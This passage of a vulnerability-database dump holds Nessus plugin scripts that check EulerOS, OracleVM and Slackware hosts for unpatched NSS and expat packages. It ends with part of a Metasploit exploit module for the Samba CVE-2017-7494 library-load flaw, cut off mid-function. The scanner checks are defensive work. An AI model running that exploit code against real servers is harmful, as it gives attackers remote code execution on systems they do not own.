crash an\n application using NSS or, possibly, execute arbitrary\n code with the permission of the user running the\n application. (CVE-2016-2834)\n\n - A NULL pointer dereference flaw was found in the way\n NSS handled invalid Diffie-Hellman keys. A remote\n client could use this flaw to crash a TLS/SSL server\n using NSS. (CVE-2016-5285)\n\n - It was found that Diffie Hellman Client key exchange\n handling in NSS was vulnerable to small subgroup\n confinement attack. An attacker could use this flaw to\n recover private keys by confining the client DH key to\n small subgroup of the desired group. (CVE-2016-8635)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1084\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b3999ccf\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected nss\nnss-util packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss-sysinit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"nss-3.21.3-2\",\n \"nss-devel-3.21.3-2\",\n \"nss-sysinit-3.21.3-2\",\n \"nss-tools-3.21.3-2\",\n \"nss-util-3.21.3-1.1\",\n \"nss-util-devel-3.21.3-1.1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nss\nnss-util\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:30:13", "bulletinFamily": "scanner", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\nnss\n\n - Added nss-vendor.patch to change vendor\n\n - Temporarily disable some tests until expired PayPalEE.cert is renewed\n\n - Rebase to 3.28.4\n\n - Fix crash with tstclnt -W\n\n - Adjust gtests to run with our old softoken and downstream patches\n\n - Avoid cipher suite ordering change, spotted by Hubert Kario\n\n - Rebase to 3.28.3\n\n - Remove upstreamed moz-1282627-rh-1294606.patch, moz-1312141-rh-1387811.patch, moz-1315936.patch, and moz-1318561.patch\n\n - Remove no longer necessary nss-duplicate-ciphers.patch\n\n - Disable X25519 and exclude tests using it\n\n - Catch failed ASN1 decoding of RSA keys, by Kamil Dudka (#1427481)\n\n - Update expired PayPalEE.cert\n\n - Disable unsupported test cases in ssl_gtests\n\n - Adjust the sslstress.txt filename so that it matches with the disableSSL2tests patch ported from RHEL 7\n\n - Exclude SHA384 and CHACHA20_POLY1305 ciphersuites from stress tests\n\n - Don't add gtests and ssl_gtests to nss_tests, unless gtests are enabled\n\n - Add patch to fix SSL CA name leaks, taken from NSS 3.27.2 release\n\n - Add patch to fix bash syntax error in tests/ssl.sh\n\n - Add patch to remove duplicate ciphersuites entries in sslinfo.c\n\n - Add patch to abort selfserv/strsclnt/tstclnt on non-parsable version range\n\n - Build with support for SSLKEYLOGFILE\n\n - Update fix_multiple_open patch to fix regression in openldap client\n\n - Remove pk11_genobj_leak patch, which caused crash with Firefox\n\n - Add comment in the policy file to preserve the last empty line\n\n - Disable SHA384 ciphersuites when CKM_TLS12_KEY_AND_MAC_DERIVE is not provided by softoken this superseds check_hash_impl patch\n\n - Fix problem in check_hash_impl patch\n\n - Add patch to check if hash algorithms are backed by a token\n\n - Add patch to disable TLS_ECDHE_[RSA,ECDSA]_WITH_AES_128_CBC_SHA256, which have never enabled in the past\n\n - Add upstream patch to fix a crash. Mozilla #1315936\n\n - Disable the use of RSA-PSS with SSL/TLS. #1390161\n\n - Use updated upstream patch for RH bug 1387811\n\n - Added upstream patches to fix RH bugs 1057388, 1294606, 1387811\n\n - Enable gtests when requested\n\n - Rebase to NSS 3.27.1\n\n - Remove nss-646045.patch, which is not necessary\n\n - Remove p-disable-md5-590364-reversed.patch, which is no-op here, because the patched code is removed later in %setup\n\n - Remove disable_hw_gcm.patch, which is no-op here, because the patched code is removed later in %setup.\n Also remove NSS_DISABLE_HW_GCM setting, which was only required for RHEL 5\n\n - Add Bug-1001841-disable-sslv2-libssl.patch and Bug-1001841-disable-sslv2-tests.patch, which completedly disable EXPORT ciphersuites. Ported from RHEL 7\n\n - Remove disable-export-suites-tests.patch, which is covered by Bug-1001841-disable-sslv2-tests.patch\n\n - Remove nss-ca-2.6-enable-legacy.patch, as we decided to not allow 1024 legacy CA certificates\n\n - Remove ssl-server-min-key-sizes.patch, as we decided to support DH key size greater than 1023 bits\n\n - Remove nss-init-ss-sec-certs-null.patch, which appears to be no-op, as it clears memory area allocated with PORT_ZAlloc\n\n - Remove nss-disable-sslv2-libssl.patch, nss-disable-sslv2-tests.patch, sslauth-no-v2.patch, and nss-sslstress-txt-ssl3-lower-value-in-range.patch as SSLv2 is already disabled in upstream\n\n - Remove fix-nss-test-filtering.patch, which is fixed in upstream\n\n - Add nss-check-policy-file.patch from Fedora\n\n - Install policy config in /etc/pki/nss-legacy/nss-rhel6.config\n\nnss-util\n\n - Rebase to NSS 3.28.4 to accommodate base64 encoding fix\n\n - Rebase to NSS 3.28.3\n\n - Package new header eccutil.h\n\n - Tolerate policy file without last empty line\n\n - Add missing source files\n\n - Rebase to NSS 3.26.0\n\n - Remove upstreamed patch for (CVE-2016-1950)\n\n - Remove p-disable-md5-590364-reversed.patch for bug 1335915", "modified": "2018-07-25T00:00:00", "id": "ORACLEVM_OVMSA-2017-0065.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99568", "published": "2017-04-21T00:00:00", "title": "OracleVM 3.3 / 3.4 : nss / nss-util (OVMSA-2017-0065)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0065.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99568);\n script_version(\"3.3\");\n script_cvs_date(\"Date: 2018/07/25 14:27:30\");\n\n script_cve_id(\"CVE-2016-1950\");\n\n script_name(english:\"OracleVM 3.3 / 3.4 : nss / nss-util (OVMSA-2017-0065)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\nnss\n\n - Added nss-vendor.patch to change vendor\n\n - Temporarily disable some tests until expired\n PayPalEE.cert is renewed\n\n - Rebase to 3.28.4\n\n - Fix crash with tstclnt -W\n\n - Adjust gtests to run with our old softoken and\n downstream patches\n\n - Avoid cipher suite ordering change, spotted by Hubert\n Kario\n\n - Rebase to 3.28.3\n\n - Remove upstreamed moz-1282627-rh-1294606.patch,\n moz-1312141-rh-1387811.patch, moz-1315936.patch, and\n moz-1318561.patch\n\n - Remove no longer necessary nss-duplicate-ciphers.patch\n\n - Disable X25519 and exclude tests using it\n\n - Catch failed ASN1 decoding of RSA keys, by Kamil Dudka\n (#1427481)\n\n - Update expired PayPalEE.cert\n\n - Disable unsupported test cases in ssl_gtests\n\n - Adjust the sslstress.txt filename so that it matches\n with the disableSSL2tests patch ported from RHEL 7\n\n - Exclude SHA384 and CHACHA20_POLY1305 ciphersuites from\n stress tests\n\n - Don't add gtests and ssl_gtests to nss_tests, unless\n gtests are enabled\n\n - Add patch to fix SSL CA name leaks, taken from NSS\n 3.27.2 release\n\n - Add patch to fix bash syntax error in tests/ssl.sh\n\n - Add patch to remove duplicate ciphersuites entries in\n sslinfo.c\n\n - Add patch to abort selfserv/strsclnt/tstclnt on\n non-parsable version range\n\n - Build with support for SSLKEYLOGFILE\n\n - Update fix_multiple_open patch to fix regression in\n openldap client\n\n - Remove pk11_genobj_leak patch, which caused crash with\n Firefox\n\n - Add comment in the policy file to preserve the last\n empty line\n\n - Disable SHA384 ciphersuites when\n CKM_TLS12_KEY_AND_MAC_DERIVE is not provided by\n softoken this superseds check_hash_impl patch\n\n - Fix problem in check_hash_impl patch\n\n - Add patch to check if hash algorithms are backed by a\n token\n\n - Add patch to disable\n TLS_ECDHE_[RSA,ECDSA]_WITH_AES_128_CBC_SHA256, which\n have never enabled in the past\n\n - Add upstream patch to fix a crash. Mozilla #1315936\n\n - Disable the use of RSA-PSS with SSL/TLS. #1390161\n\n - Use updated upstream patch for RH bug 1387811\n\n - Added upstream patches to fix RH bugs 1057388, 1294606,\n 1387811\n\n - Enable gtests when requested\n\n - Rebase to NSS 3.27.1\n\n - Remove nss-646045.patch, which is not necessary\n\n - Remove p-disable-md5-590364-reversed.patch, which is\n no-op here, because the patched code is removed later in\n %setup\n\n - Remove disable_hw_gcm.patch, which is no-op here,\n because the patched code is removed later in %setup.\n Also remove NSS_DISABLE_HW_GCM setting, which was only\n required for RHEL 5\n\n - Add Bug-1001841-disable-sslv2-libssl.patch and\n Bug-1001841-disable-sslv2-tests.patch, which completedly\n disable EXPORT ciphersuites. Ported from RHEL 7\n\n - Remove disable-export-suites-tests.patch, which is\n covered by Bug-1001841-disable-sslv2-tests.patch\n\n - Remove nss-ca-2.6-enable-legacy.patch, as we decided to\n not allow 1024 legacy CA certificates\n\n - Remove ssl-server-min-key-sizes.patch, as we decided to\n support DH key size greater than 1023 bits\n\n - Remove nss-init-ss-sec-certs-null.patch, which appears\n to be no-op, as it clears memory area allocated with\n PORT_ZAlloc\n\n - Remove nss-disable-sslv2-libssl.patch,\n nss-disable-sslv2-tests.patch, sslauth-no-v2.patch, and\n nss-sslstress-txt-ssl3-lower-value-in-range.patch as\n SSLv2 is already disabled in upstream\n\n - Remove fix-nss-test-filtering.patch, which is fixed in\n upstream\n\n - Add nss-check-policy-file.patch from Fedora\n\n - Install policy config in\n /etc/pki/nss-legacy/nss-rhel6.config\n\nnss-util\n\n - Rebase to NSS 3.28.4 to accommodate base64 encoding fix\n\n - Rebase to NSS 3.28.3\n\n - Package new header eccutil.h\n\n - Tolerate policy file without last empty line\n\n - Add missing source files\n\n - Rebase to NSS 3.26.0\n\n - Remove upstreamed patch for (CVE-2016-1950)\n\n - Remove p-disable-md5-590364-reversed.patch for bug\n 1335915\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-April/000682.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3652e035\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-April/000683.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?97bdc28b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:nss-sysinit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:nss-util\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! ereg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"nss-3.28.4-1.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"nss-sysinit-3.28.4-1.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"nss-tools-3.28.4-1.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"nss-util-3.28.4-1.el6_9\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"nss-3.28.4-1.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"nss-sysinit-3.28.4-1.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"nss-tools-3.28.4-1.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"nss-util-3.28.4-1.el6_9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nss / nss-sysinit / nss-tools / nss-util\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:28:53", "bulletinFamily": "scanner", "description": "New expat packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, 14.2, and -current to fix security issues.", "modified": "2017-09-21T00:00:00", "id": "SLACKWARE_SSA_2016-359-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96092", "published": "2016-12-27T00:00:00", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : expat (SSA:2016-359-01)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-359-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96092);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2017/09/21 13:38:14 $\");\n\n script_cve_id(\"CVE-2012-6702\", \"CVE-2015-1283\", \"CVE-2016-0718\", \"CVE-2016-4472\", \"CVE-2016-5300\");\n script_xref(name:\"SSA\", value:\"2016-359-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : expat (SSA:2016-359-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New expat packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, 14.2, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.567786\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4e91e6f9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected expat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:expat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"expat\", pkgver:\"2.2.0\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"expat\", pkgver:\"2.2.0\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"expat\", pkgver:\"2.2.0\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"expat\", pkgver:\"2.2.0\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"expat\", pkgver:\"2.2.0\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"expat\", pkgver:\"2.2.0\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"expat\", pkgver:\"2.2.0\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"expat\", pkgver:\"2.2.0\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"expat\", pkgver:\"2.2.0\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"expat\", pkgver:\"2.2.0\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"expat\", pkgver:\"2.2.0\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"expat\", pkgver:\"2.2.0\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"expat\", pkgver:\"2.2.0\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"expat\", pkgver:\"2.2.0\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-09-23T07:44:32", "bulletinFamily": "exploit", "description": "This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder. In some cases, anonymous access combined with common filesystem locations can be used to automatically exploit this vulnerability.\n", "modified": "2019-01-10T19:19:14", "published": "2017-05-25T00:42:04", "id": "MSF:EXPLOIT/LINUX/SAMBA/IS_KNOWN_PIPENAME", "href": "", "type": "metasploit", "title": "Samba is_known_pipename() Arbitrary Module Load", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Samba is_known_pipename() Arbitrary Module Load',\n 'Description' => %q{\n This module triggers an arbitrary shared library load vulnerability\n in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module\n requires valid credentials, a writeable folder in an accessible share,\n and knowledge of the server-side path of the writeable folder. In\n some cases, anonymous access combined with common filesystem locations\n can be used to automatically exploit this vulnerability.\n },\n 'Author' =>\n [\n 'steelo <knownsteelo[at]gmail.com>', # Vulnerability Discovery & Python Exploit\n 'hdm', # Metasploit Module\n 'bcoles', # Check logic\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2017-7494' ],\n [ 'URL', 'https://www.samba.org/samba/security/CVE-2017-7494.html' ],\n ],\n 'Payload' =>\n {\n 'Space' => 9000,\n 'DisableNops' => true\n },\n 'Platform' => 'linux',\n 'Targets' =>\n [\n\n [ 'Automatic (Interact)',\n { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ], 'Interact' => true,\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find'\n }\n }\n }\n ],\n [ 'Automatic (Command)',\n { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] }\n ],\n [ 'Linux x86', { 'Arch' => ARCH_X86 } ],\n [ 'Linux x86_64', { 'Arch' => ARCH_X64 } ],\n [ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ],\n [ 'Linux ARM64', { 'Arch' => ARCH_AARCH64 } ],\n [ 'Linux MIPS', { 'Arch' => ARCH_MIPS } ],\n [ 'Linux MIPSLE', { 'Arch' => ARCH_MIPSLE } ],\n [ 'Linux MIPS64', { 'Arch' => ARCH_MIPS64 } ],\n [ 'Linux MIPS64LE', { 'Arch' => ARCH_MIPS64LE } ],\n [ 'Linux PPC', { 'Arch' => ARCH_PPC } ],\n [ 'Linux PPC64', { 'Arch' => ARCH_PPC64 } ],\n [ 'Linux PPC64 (LE)', { 'Arch' => ARCH_PPC64LE } ],\n [ 'Linux SPARC', { 'Arch' => ARCH_SPARC } ],\n [ 'Linux SPARC64', { 'Arch' => ARCH_SPARC64 } ],\n [ 'Linux s390x', { 'Arch' => ARCH_ZARCH } ],\n ],\n 'DefaultOptions' =>\n {\n 'DCERPC::fake_bind_multi' => false,\n 'SHELL' => '/bin/sh',\n },\n 'Privileged' => true,\n 'DisclosureDate' => 'Mar 24 2017',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']),\n OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']),\n ])\n end\n\n def post_auth?\n true\n end\n\n # Setup our mapping of Metasploit architectures to gcc architectures\n def setup\n super\n @@payload_arch_mappings = {\n ARCH_X86 => [ 'x86' ],\n ARCH_X64 => [ 'x86_64' ],\n ARCH_MIPS => [ 'mips' ],\n ARCH_MIPSLE => [ 'mipsel' ],\n ARCH_MIPSBE => [ 'mips' ],\n ARCH_MIPS64 => [ 'mips64' ],\n ARCH_MIPS64LE => [ 'mips64el' ],\n ARCH_PPC => [ 'powerpc' ],\n ARCH_PPC64 => [ 'powerpc64' ],\n ARCH_PPC64LE => [ 'powerpc64le' ],\n ARCH_SPARC => [ 'sparc' ],\n ARCH_SPARC64 => [ 'sparc64' ],\n ARCH_ARMLE => [ 'armel', 'armhf' ],\n ARCH_AARCH64 => [ 'aarch64' ],\n ARCH_ZARCH => [ 's390x' ],\n }\n\n # Architectures we don't offically support but can shell anyways with interact\n @@payload_arch_bonus = %W{\n mips64el sparc64 s390x\n }\n\n # General platforms (OS + C library)\n @@payload_platforms = %W{\n linux-glibc\n }\n end\n\n # List all top-level directories within a given share\n def enumerate_directories(share)\n begin\n self.simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n stuff = self.simple.client.find_first(\"\\\\*\")\n directories = 